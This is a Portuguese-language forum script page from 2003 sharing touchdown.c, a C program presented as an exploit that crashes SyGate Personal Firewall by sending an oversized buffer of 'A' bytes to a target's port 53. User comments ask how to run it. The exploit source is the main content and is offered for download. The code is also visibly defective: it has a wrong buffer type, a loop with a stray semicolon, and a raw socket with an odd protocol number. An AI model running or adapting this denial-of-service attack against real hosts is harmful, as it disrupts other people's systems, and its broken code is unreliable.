Derrubando SyGate Profissional Firewall !

Publicado por Denis Zanin 02/07/2003

[ Hits: 11.252 ]

Download touchdown.c




Esse exploit eu fiz há um bom tempo, nao lembro em que versao ele estava... !
E nem sei se está funcionando perfeitamente, hehe... !
Mas mais vale o propósito educacional, uma bela aula sobre sockets em C !

Falowsss !
[]s

  



Esconder código-fonte

/*
Derrubando SyGate Personal Firewall
by vir0se - virose@bol.com.br
*/

#include <stdio.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>

#define    A            0x41
#define PORTA_INICIAL     1
#define PORTA_FINAL     7000

int main (int argc, char **argv)
{
int SockFD, addrlen, bsent, i, porta_inicial, porta_final, portas;
struct sockaddr_in UDPSock;
char *buf[1024];

printf("\n\n{FONTE}33[1;32m DERRUBANDO SYGATE PERSONAL FIREWALL \n");
printf("{FONTE}33[1;33m                       BY vir0se.....{FONTE}33[9;0m\n\n");

if(argc==1){
printf("{FONTE}33[1;34mUsando: %s [servidor] [porta inicial] [porta final]{FONTE}33[9;0m\n\n\n",argv[0]);
exit(1);
}

if (argc > 1){
porta_inicial = PORTA_INICIAL;
porta_final = PORTA_FINAL;
}
if (argc > 2)
{
porta_inicial = atoi (argv[2]);
porta_final = atoi (argv[3]);
}

for (portas = porta_inicial; portas < porta_final; portas++);

SockFD=socket(AF_INET, SOCK_RAW, 3);

UDPSock.sin_family=AF_INET;
UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
UDPSock.sin_port=htons(53);     

bzero(&(UDPSock.sin_zero), 8);

if (connect(SockFD,(struct sockaddr *)&UDPSock, sizeof(UDPSock)) < 0){
fprintf(stderr,"Connect error\n");
exit(-1);
}

bzero(buf,sizeof(buf));

printf ("\n\n{FONTE}33[1;31m ENVIANDO BUFFER OVERFLOW... SEGURA ESSA %s ...{FONTE}33[9;0m\n\n\n", argv[1]);

for(i=0; i < 1024; i++)
buf[i] = (char *) A;
buf[1024 -1] = '{FONTE}';

if(bsent=sendto(SockFD,buf,strlen(buf),0,(struct sockaddr *)&UDPSock, sizeof(struct sockaddr_in)) < 0){
printf("erro write()\n");
close(SockFD);
exit(-1);
}

printf("DADOS ENVIADOS COM SUUUUUUUUUUU... CESSOOO... .\nDados Enviados: %i\n\n\n",bsent);
close(SockFD);
return 0;
}

Scripts recomendados

Biblioteca estática para manipulação de pilhas

Jogo Simon (Genius) - com gráficos

C/C++

Tipos de Dados Abstrato - TDA - Números Complexos

Arvore Binária


  

Comentários
[1] Comentário enviado por vir0se em 02/07/2003 - 14:36h

Fala galera !!! Essa contribuicão de script veio com 2 erros, ai vai as correcões:

1) Nome do Firewall: Nao é SyGate Profissional Firewall e sim SyGate Personal Firewall !
Esse é um exploit para a versao gratuita do firewall . É muito provavel que já foi corrigida a falha !

2) Código-fonte: Se voces forem testar o script, é melhor que façam o download dele invés de
copiar e colar, na seção CODIGO FONTE, pois sem querer apareceu diversos erros... !

Falows !

[2] Comentário enviado por rsanque em 18/03/2004 - 12:18h

Ola, Gostaria de esclarecer uma duvida. Rodei o touchdown.c mas acontece q ele nao envia dados
nenhum para o servidor que estou tentando testar...

O que pode estar acontecendo... eu coloco da seguinte forma.
./sygate 200.xxx.xxx.xxx 1 7000

esta correto.
[]s,
Rafael

[3] Comentário enviado por dark_slack em 07/09/2004 - 02:08h

Como e que faz pra derrubar um firewall desses? qual o comando? e possivel eu derrubar esse firewall sem tar em rede?


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts